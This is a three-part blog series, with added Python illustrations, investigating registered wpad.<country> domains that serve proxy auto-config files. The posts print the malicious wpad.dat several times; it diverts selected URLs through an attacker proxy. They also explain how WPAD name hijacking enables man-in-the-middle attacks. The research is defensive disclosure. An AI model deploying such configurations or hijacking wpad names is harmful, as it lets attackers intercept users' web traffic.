Posts Tagged dns
The mysterious Web Proxy Automatic Discovery (WPAD) Italian exploit — Part III
Posted by Jacopo Corbetta in Security on May 30, 2009
Some weeks ago I (Jacopo Corbetta) and Luca Invernizzi wrote about a curious potential Man-In-The-Middle attack exploiting flaws in the Web Proxy Automatic Discovery (WPAD) and DNS protocols. Long story short, if you register a wpad.domain name you might be able to perform a very stealthy Man-In-The-Middle attack. Now, DNS is complicated and programs are buggy, so hijacking a wpad.Top-Level-Domain name like wpad.com (or wpad.it or (!) wpad.wroclaw.pl) could expose a lot of computers to your attack.
You might recall that I was puzzled by the content of wpad.it/wpad.dat and wondered which Italian sites were targeted. Then Luca pointed out it was registered by a Polish guy, and that he had identified one of the possible targets as systempartnerski.pl.
We had in mind to run some analysis and then alert the registrars before posting again, but since the WPAD topic got attention on BugTraq yesterday it may be more timely to publish our results now.
UPDATE: The wpad.dat served by the Polish guy has changed! It appears they removed the site identified by Luca! The file was still in the original form when we reported our findings to the Italian security mailing list sikurezza.org (see this message posted on 21/05; Alessandro posted our results on 18/05). This thing is getting interesting... Anyway, here's the new file:
    function FindProxyForURL(url, host) {
        //regular expressions supported?
        if ( shExpMatch(url, "http*//*g*ad*nd*c*m*sh*ds*js") )
            return "PROXY 72.55.164.182:80";
        return "DIRECT";
    }
Hunting for WPAD exploits
As we wrote before, the only reliable list of effective top level domains is the one used in the Mozilla code, publicly maintained at publicsuffix.org. Each of these domains — if registered — could hide a malicious wpad.dat with potentially wide reach.
We think security-conscious DNS registrars should deny any request for these names — regardless of whether the underlying WPAD vulnerability is widespread or not, we should do everything in our power to reduce the attack potential.
In our first random probes, we found the same strange wpad.dat on wpad.it, wpad.cz and wpad.pl. But then we got curious: how common is this problem? How many wpad.dats are found in the wild? So I wrote a small Python script which attempted to resolve all wpad.tld names and to retrieve the associated wpad.tld/wpad.dat files.
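As an added illustration (not the script from the original post, which was never published), here is a Python hunter of the kind described above: it takes a publicsuffix.org-style list, tries wpad.<suffix> for every literal entry, fetches /wpad.dat where the name resolves, sorts each answer into the buckets the post uses below (nothing served, empty, not a PAC at all such as a parking page, neutral, proxying) and groups the names by the proxy they point victims at. The suffix list, the DNS answers (RFC 5737 addresses) and the PAC bodies embedded here are constructed so the example runs offline; calling `hunt()` with its default `resolve`/`fetch_wpad_dat` queries the live names instead.

```python
"""Re-creation of the wpad.<suffix> hunt: resolve every wpad.<public suffix>,
fetch /wpad.dat where the name resolves, and sort what comes back."""
import re
import socket
import urllib.error
import urllib.request


def load_suffixes(psl_text):
    """Literal entries of a publicsuffix.org-style list.  Comment ('//') and
    blank lines are dropped, and so are the '*.' and '!' rule entries, which
    are patterns rather than names one could register wpad under."""
    names = []
    for line in psl_text.splitlines():
        line = line.strip()
        if not line or line.startswith("//") or line.startswith(("*.", "!")):
            continue
        names.append(line)
    return names


def proxy_hosts(body):
    """host:port strings named in PROXY directives of a PAC body."""
    if not body:
        return []
    return re.findall(r'PROXY\s+([^\s;"]+)', body)


def classify_pac(body):
    """Bucket a retrieved wpad.dat the way the post does."""
    if body is None:
        return "no-http"          # name resolves but nothing is served
    if not body.strip():
        return "empty"
    if "FindProxyForURL" not in body:
        return "not-a-pac"        # parking page, redirect, ...
    if proxy_hosts(body):
        return "proxying"
    return "neutral"              # only ever returns DIRECT


def resolve(name, timeout=5.0):
    """A record for name, or None if it does not resolve (real DNS)."""
    socket.setdefaulttimeout(timeout)
    try:
        return socket.gethostbyname(name)
    except OSError:
        return None


def fetch_wpad_dat(name, timeout=5.0):
    """Body of http://name/wpad.dat, or None on any HTTP/network failure."""
    req = urllib.request.Request("http://%s/wpad.dat" % name,
                                 headers={"User-Agent": "wpad-hunter/0.1"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read(64 * 1024).decode("latin-1")
    except (urllib.error.URLError, OSError, ValueError):
        return None


def hunt(suffixes, resolver=resolve, fetcher=fetch_wpad_dat):
    """{wpad.<suffix>: (ip, bucket, sorted proxy hosts)} for names that resolve.
    resolver/fetcher are injectable so the logic can be tested offline."""
    found = {}
    for suffix in suffixes:
        name = "wpad." + suffix
        ip = resolver(name)
        if ip is None:
            continue
        body = fetcher(name)
        found[name] = (ip, classify_pac(body), sorted(set(proxy_hosts(body))))
    return found


def group_by_proxy(found):
    """Which names send their victims to the same proxy."""
    groups = {}
    for name, (_ip, _bucket, proxies) in found.items():
        for proxy in proxies:
            groups.setdefault(proxy, []).append(name)
    return groups


# --- constructed offline sample (not real DNS/HTTP answers) -----------------
SAMPLE_PSL = """\
// ===BEGIN ICANN DOMAINS===
com
it
pi.it
pl
wroclaw.pl
*.ck
!www.ck
ch
"""
# cut-down version of the file the post shows, same proxy address
MALICIOUS_PAC = '''function FindProxyForURL(url, host) {
  if (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*")) return "PROXY 72.55.164.182:80; DIRECT";
  return "DIRECT"; }'''
NEUTRAL_PAC = 'function FindProxyForURL(url, host) { return "DIRECT"; }'
FAKE_DNS = {"wpad.com": "192.0.2.20", "wpad.it": "192.0.2.30",
            "wpad.pl": "192.0.2.30", "wpad.ch": "192.0.2.40"}   # made-up answers
FAKE_HTTP = {"wpad.it": MALICIOUS_PAC, "wpad.pl": MALICIOUS_PAC,
             "wpad.ch": NEUTRAL_PAC}                            # wpad.com: nothing


def sample_hunt():
    """The hunt run against the constructed answers above."""
    return hunt(load_suffixes(SAMPLE_PSL), FAKE_DNS.get, FAKE_HTTP.get)


if __name__ == "__main__":
    for name, info in sample_hunt().items():
        print(name, info)
    print(group_by_proxy(sample_hunt()))
```

The injectable resolver and fetcher are the point of the design: the classification and grouping logic is exercised with canned answers, and the same code queries the live names when the defaults are used. Grouping by proxy is what makes a cluster like the 42 domains below stand out immediately.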
The TLD menace
There are something like 3370 effective top-level domains in the publicsuffix.org list. 122 wpad.<TLD> names are actually registered and resolve to an IP address. 62 of them return data when asked for a wpad.dat over HTTP.
11 of those wpad.dats look like generic “domain parking” pages. I am not completely sure, since I don’t speak all those languages. Here’s the list:
.ar.com .cm .gouv.rw .ph .st .tv .cg .co.st .kiev.ua .rw .tk
The wpad.cn/wpad.dat and wpad.net.ua/wpad.dat also look like some kind of redirect pages. This brings the total of innocuous[1] domains to 13.
The wpad domains for Switzerland and Liechtenstein (.ch and .li) return a "neutral" wpad.dat (that is, no proxy for any URL). For .tsaritsyn.ru and .volgograd.ru an empty file is returned. I don't know if this means that the wpad domain name was claimed by some good guy (like the one who registered wpad.com, for example). To be completely sure we would need to perform the query from Switzerland or Russia.[2]
The wpad.dats for vn.ua, ptz.ru and karelia.ru look quite complicated and might even be legitimate proxying attempts by a regional ISP. Additional investigation would be required. Here are the files.
The remaining 42 wpad domains were serving exactly the same wpad.dat file (now they have changed it! See our update on top) (indented for clarity):
    function FindProxyForURL(url, host) {
        //regular expression/complexity supported?
        if ( (shExpMatch(url, "http://*g*ad*nd*c*m*sh*ds*js")) ||
             (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*") && !shExpMatch(url, "http*//*n*o.*")) ) {
            return "PROXY 72.55.164.182:80; DIRECT";
        }
        return "DIRECT";
    }
All of these domains have probably been registered by the same guy (even if WHOIS records are inconclusive). The WHOIS for wpad.pl even has his name (we don't know if it is accurate, though, so we'll avoid posting names). Here is the list of affected domains:
.asia .at .be .bialystok.pl .biz.pl .bydgoszcz.pl .cc .co.at .com.es .com.pl .com.tw .cz .edu.pl .es .in .it .katowice.pl .name .net.cn .net.in .net.pl .nom.es .olsztyn.pl .opole.pl .org.cn .org.es .org.in .org.pl .org.tw .pl .radom.pl .ro .rzeszow.pl .sk .slask.pl .szczecin.pl .tw .warszawa.pl .waw.pl .wroclaw.pl .ws .zgora.pl
As you can see, our friend has been able to grab the global wpad domain for 12 countries, including Poland, Italy, Spain, Austria, Belgium, the Czech Republic, Romania and India.
Final thoughts and mysteries
The most obvious recommendation is that you register wpad.yourdomain.com in your organization's DNS (e.g. since our beloved school has sssup.it and we administer the allievi.sssup.it subdomain, we have pointed wpad.allievi.sssup.it at a meaningless IP and we'll recommend that the network staff do the same with wpad.sssup.it). This will immediately stop your clients' search for a wpad.dat.
We would also recommend that registrars delete wpad.domain entries, or at least avoid accepting new ones. As time allows (the exam session is near!) we'll bring this matter to the attention of the registrar admins; let's hope they listen to us. If someone with a big name is reading this (cool!), you might wish to contact some DNS authorities.
While Luca cracked the second wildcard expression (http*//*s*st*mp*tn*sk*p*), we still have no idea which sites are targeted by the first one (http://*g*ad*nd*c*m*sh*ds*js; maybe a JavaScript file?). And why did they use such a wide exclusion pattern (http*//*n*o.*) in the original file? Also, the proxy isn't working for us; maybe they are answering only to IPs in Poland?
Now that the Polish guys have changed their wpad.dat some days ago, we wonder what our next move should be... and what their next move will be! We'll post updates here, so stay tuned.
[1] The wpad.dat file has to be in a special JavaScript-like format; see findproxyforurl.com for details.
[2] The wpad.ch server might be serving a harmless wpad.dat to foreign hunters and a malicious one to domestic victims (of course, this applies to all domains in this list, with the possible exception of Italy, our home country).
The mysterious Web Proxy Automatic Discovery (WPAD) Italian exploit — Part II
Posted by Luca Invernizzi in Security on May 14, 2009
After reading Jacopo’s article on WPAD, I’ve tried to understand the Italian global wpad.it/wpad.dat:
    function FindProxyForURL(url, host) {
        //regular expression/complexity supported?
        if ( (shExpMatch(url, "http://*g*ad*nd*c*m*sh*ds*js")) ||
             (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*") && !shExpMatch(url, "http*//*n*o.*")) ) {
            return "PROXY 72.55.164.182:80; DIRECT";
        }
        return "DIRECT";
    }
The proxy
The first thing that concerned me is that the IP address used as proxy is Polish:
    $ host 72.55.164.182
    182.164.55.72.in-addr.arpa domain name pointer wpad.pl
It's registered to a guy in Wloclawek, and it's been up since December 2008, so it's pretty new. The hosted site is syndicated, which is usually a fishy sign.
The syntax
The script provides a fallback policy to a direct connection: if the proxy does not answer, the browser silently connects directly, so the victim's browsing never breaks and the attacker's proxy is never a visible point of failure or overload, as described on Wikipedia:
    return "PROXY 72.55.164.182:80; DIRECT"
The regular expression
I've downloaded the Alexa top 1 million sites list, which is updated daily, and I discovered that the second regular expression,
    "http*//*s*st*mp*tn*sk*p*"
gets one and only one match: a Polish internet trading site.
    $ cat top-1m.csv | sed -ne "s/.*s.*st.*mp.*tn.*sk.*p.*/&/p"
    154967,systempartnerski.pl
The first regular expression, even without its initial and final part, does not match any site in the Alexa top million.
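To make the pattern analysis of this post and of Part III reproducible, here is an added example (not code from the original posts): a Python port of the PAC helper shExpMatch() and of the wpad.it decision logic, run over a few constructed URLs. It shows the second glob catching both http and https URLs on systempartnerski.pl, the exclusion pattern dropping any URL in which an "n" is followed somewhere later by "o.", and how loose the first glob is: any URL ending in "js" whose text happens to contain g, ad, nd, c, m, sh, ds in that order is proxied, whatever the site. Apart from systempartnerski.pl, the hosts and paths are invented; the glob-to-regex rewrite mirrors the Mozilla/Chromium PAC helper, and IE's implementation may differ in detail.

```python
"""Offline evaluation of the wpad.it PAC logic: which URLs would it proxy?"""
import re


def sh_exp_match(text, pattern):
    """Python port of the PAC helper shExpMatch(): a shell-style glob in which
    '*' matches any run of characters and '?' exactly one, anchored at both
    ends and case-sensitive (the Mozilla/Chromium helper rewrites the glob
    into a ^...$ RegExp in the same way)."""
    regex = "".join(".*" if c == "*" else "." if c == "?" else re.escape(c)
                    for c in pattern)
    return re.fullmatch(regex, text, re.DOTALL) is not None


# The three globs and the return value from the original wpad.it/wpad.dat.
FIRST = "http://*g*ad*nd*c*m*sh*ds*js"
SECOND = "http*//*s*st*mp*tn*sk*p*"
EXCLUDE = "http*//*n*o.*"
PROXY = "PROXY 72.55.164.182:80; DIRECT"


def find_proxy_for_url(url, host=""):
    """Same decision as the file's FindProxyForURL(), expressed in Python so
    it can be run over a list of URLs without a browser."""
    if sh_exp_match(url, FIRST) or (
            sh_exp_match(url, SECOND) and not sh_exp_match(url, EXCLUDE)):
        return PROXY
    return "DIRECT"


def proxied(urls):
    """URLs that the PAC would route through the attacker's proxy."""
    return [u for u in urls if find_proxy_for_url(u) != "DIRECT"]


def host_hits(domains, core="*s*st*mp*tn*sk*p*"):
    """The sed filter above, in Python: domain names that satisfy the second
    glob once its 'http*//' prefix is dropped (the host alone decides whether
    every URL on that site matches)."""
    return [d for d in domains if sh_exp_match(d, core)]


# Constructed sample URLs (not from the original page), one per branch.  The
# only real site name is systempartnerski.pl, identified above as the match
# for the second glob; the paths and the other hosts are invented.
SAMPLE_URLS = [
    "http://www.systempartnerski.pl/",                 # second glob -> proxy
    "https://www.systempartnerski.pl/login",           # 'http*//' covers https
    "http://www.systempartnerski.pl/news/promo.html",  # 'n' ... 'o.' -> excluded
    "http://images.example.org/load-indicator-scheme/show-ads.js",  # first glob
    "http://www.example.com/",                         # untouched
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print("%-36s %s" % (find_proxy_for_url(url), url))
    print(host_hits(["systempartnerski.pl", "google.com", "systemplatform.sk"]))
```

Because the globs are matched against the full URL rather than the host, the exclusion pattern fires on paths as well: a page named promo.html on the targeted site goes direct while the front page is proxied, which is one reading of why the exclusion is so wide.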
The mysterious Web Proxy Automatic Discovery (WPAD) Italian exploit — Part I
Posted by Jacopo Corbetta in Security on May 13, 2009
The network here at Sant'Anna School of Advanced Studies is quite complicated, so sometimes the only way to solve a connectivity problem is to open Wireshark and start looking around. As you may know, Windows boxes are quite chatty and they love to send out NetBIOS broadcast packets to resolve names, elect popes, fight back with anti-popes, and so on. But this time I noticed something strange in the broadcast jam: a PC was continuously trying to reach the nonexistent WPAD.SSSUP.IT machine.
I got curious, looked up what WPAD is, and found a couple of interesting things.
What the heck is this WPAD thing?
It turns out Internet Explorer developers thought an organization might wish to set up elaborate rules for web proxying. Therefore, they devised a way for network admins to autoconfigure IE proxy settings: the Web Proxy Auto-Discovery protocol (WPAD). All major browsers currently support this feature. Note that many applications on Windows default to following IE's proxy settings, so whoever controls the configuration file can intercept far more than browser traffic: the Man-In-The-Middle potential is very high.
Basically, the browser issues a request for http://wpad.yourdomain.com/wpad.dat[1], which should contain a JavaScript function called FindProxyForURL(url, host). The function can use wildcard matching to return different proxies (or a direct connection) for different addresses. All the gory details are available at www.findproxyforurl.com.
Exploiting WPAD
Things can get complicated if you have a subdomain (e.g. if your computer is called bob.office.yourdomain.com then wpad.office.yourdomain.com is tried too), but the key point is the same: if someone hijacks one of your wpad names, sophisticated Man-In-The-Middle attacks are possible. Since network admins often forget to set up a wpad host for their domain, the DNS lookup fails and Windows may try to resolve the name in other ways, even by broadcasting a NetBIOS request, which anyone on the local network can answer.[2]
Now, auto-configuration of network parameters is very useful; tools like DHCP and transparent proxies are in wide use. However, this kind of auto-configuration brings risks: a rogue DHCP server is transparent to users and can avoid detection. DHCP is a very well known protocol, and network admins have long learnt to watch out for suspicious DHCP activity. WPAD is, in comparison, a somewhat obscure protocol. Buggy programs (and lax policies by domain registrars) create a sneaky exploit opportunity.
The DNS beast
As you might have guessed, Windows should stop short of the top-level domain (.com) in its quest for a wpad.dat. However, two issues come into play:
- On certain buggy versions, the global wpad.com/wpad.dat is requested. Now, the wpad.com domain has been taken by a (let's hope) good guy, who chose not to serve a wpad.dat. But what about other Top-Level Domains (TLDs) like wpad.cz or wpad.it?
- Some countries (like Italy) allow you to register domain names right under their national suffix (e.g. our beloved School has sssup.it). Other countries (the United Kingdom, for instance) chose to mimic the global TLD structure, so their addresses look like google.co.uk, ox.ac.uk, and so on. Some even mix the two policies.
Combine these two facts, and you get a big mess. Issue #2 means that when you see a domain name it is very hard to tell which part is the registry-controlled suffix and which is the specific domain name. It is not immediately obvious, for instance, that pi.it behaves like a global TLD (it is reserved for the Italian province of Pisa) while sns.it is the site of our arch-rival, the infamous Scuola Normale Superiore.
There is no "good" solution to this problem. Mozilla developers ended up creating a list of "Effective TLDs"[3] which the browser treats like global TLDs.
Each item on this list is an exploit opportunity for the WPAD bug: just register the wpad.it domain and you potentially control the proxy settings of every buggy machine with a .it name.
Attack on Italy: the wpad.it mystery
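An added example (not from the original post) of the name devolution the two issues above are about, in Python: from a client's own host name it derives the wpad.* names the client would try under three stopping rules and flags the ones whose parent is a public suffix, i.e. names a registrar could hand to anyone. The suffix set is a hand-picked subset of the publicsuffix.org list (wildcard and exception rules are ignored), and the host names are made up except for the page's own sssup.it and pi.it.

```python
"""Which wpad.* names does a client derive from its own host name, and at
which step should it stop?  Three stopping rules, compared."""

# Constructed subset of the publicsuffix.org list (real entries, but only a
# handful of the thousands on the list; a real check would load the file).
PUBLIC_SUFFIXES = {"com", "it", "pi.it", "uk", "co.uk", "ac.uk", "pl", "wroclaw.pl"}


def public_suffix(host):
    """Longest suffix of host that is on the list (exact entries only; the
    real list also has '*.' wildcard and '!' exception rules, ignored here)."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in PUBLIC_SUFFIXES:
            return candidate
    return None


def wpad_candidates(host, rule="suffix"):
    """Names a WPAD client tries, stripping the leftmost label each time
    (bob.office.example.com -> wpad.office.example.com, wpad.example.com, ...).
      rule="suffix": stop before the effective TLD (what the Mozilla list is for)
      rule="tld":    stop before the last label only (label counting: fine for
                     .com, wrong for .co.uk-style registries)
      rule="none":   never stop (the buggy behaviour that ends up asking wpad.com)"""
    labels = host.lower().rstrip(".").split(".")
    suffix = public_suffix(host)
    names = []
    for i in range(1, len(labels)):
        parent = ".".join(labels[i:])
        if rule == "suffix" and parent == suffix:
            break
        if rule == "tld" and i == len(labels) - 1:
            break
        names.append("wpad." + parent)
    return names


def registry_controlled(names):
    """Candidates whose parent is a public suffix: anyone may register them."""
    return [n for n in names if n.split(".", 1)[1] in PUBLIC_SUFFIXES]


if __name__ == "__main__":
    for host in ("bob.office.example.com", "bob.example.co.uk",
                 "pc.allievi.sssup.it", "sns.pi.it"):
        for rule in ("suffix", "tld", "none"):
            names = wpad_candidates(host, rule)
            print(host, rule, names, "exposed:", registry_controlled(names))
```

Running it shows the two issues side by side: with label counting a machine under co.uk or pi.it still asks wpad.co.uk or wpad.pi.it, and with no stop rule every machine in a country ends up asking wpad.<country>; only the public-suffix rule never produces a registry-controlled name.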
You might think registrars would think twice before assigning a “wpad.country” domain. It turns out that sometimes this is not the case.
Some global wpad domains do exist and many of them serve a malicious wpad.dat. I’m gathering data and I’ll post when I have enough to make an interesting summary.
But take a look at this, the global wpad.it/wpad.dat:
    function FindProxyForURL(url, host) {
        //regular expression/complexity supported?
        if ( (shExpMatch(url, "http://*g*ad*nd*c*m*sh*ds*js")) ||
             (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*") && !shExpMatch(url, "http*//*n*o.*")) ) {
            return "PROXY 72.55.164.182:80; DIRECT";
        }
        return "DIRECT";
    }
What the hell is this? It appears the attacker is targeting some specific websites, but the wildcards are quite complicated. Any idea what they might be?
UPDATE: found this same file on wpad.cz, full analysis in progress.
UPDATE: a more in depth analysis here and here
[1] Windows can also read its settings from DHCP and even from a special DNS entry. The official Microsoft documentation is somewhat sparse, but detailed information can be found in the draft submitted for standardization (previous version), in TechNet, in some knowledge base articles, and of course on Wikipedia. Another file which can be requested is wspad.dat, which has a different format.
[2] Even when a WINS server is present, naming your computer WPAD.YOURDOMAIN.COM might do the trick.
[3] Browsers need this list to enforce cookie restrictions (what if someone were able to set a cookie on all ".co.uk" domains?). The list is now publicly maintained at publicsuffix.org.